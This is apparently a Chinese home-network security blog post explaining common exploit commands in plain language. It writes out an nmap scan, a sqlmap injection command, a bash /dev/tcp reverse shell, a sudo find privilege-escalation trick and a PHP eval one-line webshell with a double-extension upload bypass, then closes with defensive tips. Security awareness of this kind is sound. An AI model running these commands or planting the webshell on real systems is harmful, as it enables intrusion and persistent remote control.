日常妙招屋
白蓝主题五 · 清爽阅读
首页  > 网络监控

这些漏洞利用常用命令,你得心里有数

家里装了智能摄像头,结果发现总有陌生IP在尝试登录?隔壁老王的路由器莫名其妙被远程控制了,连上了他的家用打印机?听起来像电影情节,其实背后可能就藏着几个简单的漏洞利用命令。网络世界没那么风平浪静,了解一些常见操作,不是为了搞破坏,而是更清楚风险在哪。

扫描开放端口:看看门有没有关好

很多攻击第一步就是“敲门”,看看哪些服务暴露在外。nmap 是个常用工具,比如想查某台设备开了哪些端口:

nmap -sV 192.168.1.100

这条命令会列出目标主机开放的服务和版本号。就像你下班前检查办公室门窗,别人也能用它扫你家路由器。

检测Web漏洞:别让网页成突破口

现在很多家电靠网页管理,比如NAS、监控系统。如果页面存在SQL注入,一条命令就能撬开数据库:

sqlmap -u "http://192.168.1.50/login.php?user=admin" --dbs

这行命令会让 sqlmap 自动探测URL是否存在注入点,并尝试列出数据库名。如果你自己搭了个家庭相册网站,却用了网上随便下载的老旧PHP程序,很可能就中招。

反弹Shell:从内往外建立控制通道

一旦找到漏洞,攻击者常会执行反弹shell,把控制权拉到自己手里。比如在目标机器上运行:

bash -i >& /dev/tcp/192.168.1.20/4444 0>&1

前提是你的电脑(192.168.1.20)开了4444端口监听。这就像小偷进了屋,反手给你家大门接了个遥控器,他自己随时能进来。

提权命令:拿到更高权限

刚进系统可能只是普通用户,但攻击者不会满足于此。Linux下常见的提权方式是找sudo权限漏洞:

sudo find /etc/passwd -exec /bin/sh \;

某些配置错误的系统允许通过find命令执行shell,从而获得root权限。就像租客本不该改电表,结果发现工具箱没锁,顺手就把电费给免了。

上传Webshell:留下长期后门

有些系统允许上传文件,但没过滤类型。传一个一句话木马,就能长期控制:

<?php @eval($_POST["cmd"]); ?>

保存为 image.php.jpg 这类双后缀,绕过简单检测。之后用菜刀、蚁剑这类工具连接,就像在你家墙上偷偷装了个暗门,想来就来。

这些命令本身不坏,安全人员也用它们做检测。关键是知道它们存在,才不会稀里糊涂中招。定期更新固件,关闭不用的服务,复杂密码别偷懒——道理老套,但最管用。